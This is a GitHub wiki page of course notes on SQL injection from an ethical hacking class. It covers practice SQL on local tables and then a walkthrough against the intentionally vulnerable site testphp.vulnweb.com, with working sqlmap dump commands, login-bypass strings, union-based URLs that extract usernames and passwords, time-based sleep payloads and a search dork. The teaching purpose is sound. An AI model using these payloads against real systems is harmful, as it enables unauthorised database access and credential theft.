0.01 Class 10 SQL injection attack - cloudsecuritylabs/ethicalhackingclass GitHub Wiki
create table attackers(id INT(15), username VARCHAR(15), password VARCHAR(15), country VARCHAR(15), fruit VARCHAR(15));
create table defenders(id INT(15), username VARCHAR(15), password VARCHAR(15), country VARCHAR(15), fruit VARCHAR(15));
INSERT INTO attackers (id, username, password, country, fruit) VALUES (1234,'james','777','UK','apple');
INSERT INTO attackers (id, username, password, country, fruit) VALUES (1,'john','johnnyboy','USA','kiwi');
INSERT INTO attackers (id, username, password, country, fruit) VALUES (11,'jane','pa$$word','GER','avocado');
INSERT INTO attackers (id, username, password, country, fruit) VALUES (8888,'jake','01011970','UK','lemon');
INSERT INTO attackers (id, username, password, country, fruit) VALUES (81,'jolene','beautifulworld','USA','chery');
INSERT INTO defenders (id, username, password, country, fruit) VALUES (12,'alice','pass1','USA','banana');
INSERT INTO defenders (id, username, password, country, fruit) VALUES (14,'bob','password1','USA','peach');
INSERT INTO defenders (id, username, password, country, fruit) VALUES (12222,'david','password1','ITA','vanilla');
INSERT INTO defenders (id, username, password, country, fruit) VALUES (522,'chris','chris1','AUS','orange');
INSERT INTO defenders (id, username, password, country, fruit) VALUES (101,'robert','robi','CAN','mango');
select * from attackers order by id;
select * from defenders order by id;
select * from attackers union select * from defenders;
select * from attackers where id=1;
select * from attackers where id=-1;
select * from attackers where id=-1 or 1=1;
select * from attackers order by 1;
select * from attackers order by 1,2,3,4,5;
select * from attackers order by 6;
select * from attackers where id union all select version(),user(),database(),4,5;
select * from attackers into outfile '/tmp/database.txt';
- https://dev.mysql.com/doc/refman/8.0/en/
- https://docs.oracle.com/en/database/oracle/oracle-database/index.html
- https://docs.microsoft.com/en-us/sql/sql-server/?view=sql-server-ver15
https://www.sqltutorial.org/sql-sample-database/
┌──(student㉿kalinew)-[~]
└─$ sudo -i
┌──(root㉿kalinew)-[~]
└─# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 41
Server version: 10.6.7-MariaDB-3 Debian buildd-unstable
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
- One of the most popular open source SQL
#
/*comment*/
-- (here we need a blank space after --)
;%00 ((%00 is the null character)
` (Reverse single quote)
---
- mysql (only available to privileged users)
- information_schema (only available from MySQL version 5 onward)
Get useful version information
- version()
- @@VERSION
- Lightweight
- Directly embedded in application code
- No client-server authentication is required
- good for light weight applications such as mobile app
- standalone
- single database file
- multi model DBMS
- popular choice for enterprise applications *** only one way to insert comments: --**
- Default databases: SYSTEM and SYSAUX
- No. 1 choice for windows based systems
- supports @@VERSION
/*comment*/
--
%00
pubs
model
msdb
tempdb
northwind
information_schema
- Network databases -> connected nodes
- Graph based database -> based on connections
- Object oriented database -> data as objects
- Document based -> data with documents containing KV
SELECT
WHERE
DISTINCT
ORDER BY
INSERT INTO
CREATE TABLE
ALTER DATABASE
DROP DATABASE
- Can be exploited via web
- Malicious code is inserted
- data exfiltration
- (') or the double quote ("): used as a delimiter for text values within queries
- (;) : used to separate different commands
- – : can render the next part of a SQL query useless
- Error Based - server provides error messages
- Union Based - union based commands
- Boolean based (True and False queries)
- Time based (Time Delay Query)
TEST website: http://www.vulnweb.com/
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
[19:56:36] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| name | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname --dump
Database: acuart
Table: users
[1 entry]
+-------+
| uname |
+-------+
| test |
+-------+
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C pass --dump
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname,pass --dump
Database: acuart
Table: users
[1 entry]
+-------+------+
| uname | pass |
+-------+------+
| test | test |
+-------+------+
- sudo apt-get install jsql
[20:14:33,622] jSQL Injection v0.85 on Java 11.0.14.1-amd64-en
[20:14:34,614] [New release v0.85] Various internal improvements, Run now on latest Java 17
[20:14:34,614] [Ongoing] Experiment with Kerberos, Websocket, GraphQL, Kubernetes and DNS
[20:14:34,614] [Roadmap] More tampers, DNS/HTTP Out of band, WAF fingerprint
[20:16:03,958] Starting new injection: http://testphp.vulnweb.com/artists.php?artist=-1
[20:16:03,981] Connection test...
[20:16:04,239] Found status HTTP 200 Success
[20:16:04,254] Found 1 ignored <form> in HTML body:
<form action="search.php?test=query" method="post" />
<input name="searchFor" value="" />
<input name="goButton" value="go" />
[20:16:04,278] Fingerprinting database...
[20:16:04,530] Basic fingerprint matching vendor [MySQL]
[20:16:04,539] Using [MySQL]
[20:16:04,548] Fingerprinting character insertion with Boolean match...
[20:16:05,357] Found character insertion [0221011001] using Boolean match
[20:16:05,444] Fingerprinting database and character insertion with Order by match...
[20:16:05,841] Using [MySQL] and [0221011001]
[20:16:05,851] Add manually the character * like [-1*] to force the value [-1]
[20:16:05,851] Checking strategy Time with AND...
[20:16:06,230] Checking strategy Time with OR...
[20:16:21,271] Error during connection: request timed out
[20:16:21,292] Error during connection: request timed out
[20:16:21,292] Error during connection: request timed out
[20:16:21,298] Error during connection: request timed out
[20:16:21,299] Error during connection: request timed out
[20:16:21,300] Error during connection: request timed out
[20:16:21,677] Vulnerable to Time injection with OR
[20:16:21,677] Checking strategy Blind with AND...
[20:16:22,469] Checking strategy Blind with OR...
[20:16:23,256] Vulnerable to Blind injection with OR
[20:16:23,261] Checking strategy Error...
[20:16:27,232] Checking strategy Normal...
[20:16:27,785] Normal strategy triggered with query [union select 1,2,3]
[20:16:28,339] Vulnerable to Normal injection at index [1] using [65537] characters
[20:16:28,343] Using strategy [Normal]
[20:16:28,347] Fetching metadata...
[20:16:28,544] Database [acuart] on MySQL [8.0.22-0ubuntu0.20.04.2] for user [acuart@localhost]
[20:16:28,553] Fetching databases...
[20:16:28,939] Done
- sudo apt-get install sqlsus
sql -g attack
vi attack
update url_start our $url_start = "http://testphp.vulnweb.com/artists.php?artist=1";
- Asking True and False queries https://brightsec.com/blog/sql-injection-attack/
or 1=1
or 1=1--
or 1=1#
or 1=1/*
or 1=`1
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1#
http://testphp.vulnweb.com/login.php ' or 1='1
- Errors reported by database
- database structure
- site:http://testphp.vulnweb.com php?id=
http://testphp.vulnweb.com/artists.php?artist=1%27
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62
- which one does not return an error?
http://testphp.vulnweb.com/artists.php?artist=1 order by 6--
http://testphp.vulnweb.com/artists.php?artist=1 order by 5--
http://testphp.vulnweb.com/artists.php?artist=1 order by 4--
http://testphp.vulnweb.com/artists.php?artist=1 order by 3--
http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3--
**http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3--**
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),3--
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,version()--
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,database()--
acuart
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--
artists,carts,categ,featured,guestbook,pictures,products,users
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users"--
address,cart,cc,email,name,pass,phone,uname
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(uname) from users--
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(pass) from users--
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(uname, 0x3a,pass) from users--
test
test
- login to website! with test/test
- part of blind injection attack
- prepare time delay query such as sleep, wait for delay etc
http://testphp.vulnweb.com/artists.php?artist=1-sleep(15)
http://testphp.vulnweb.com/artists.php?artist=1 and sleep(5)
- No special chars in queries
- No suspicious commands (only authorized commands)
- Sanitize user inputs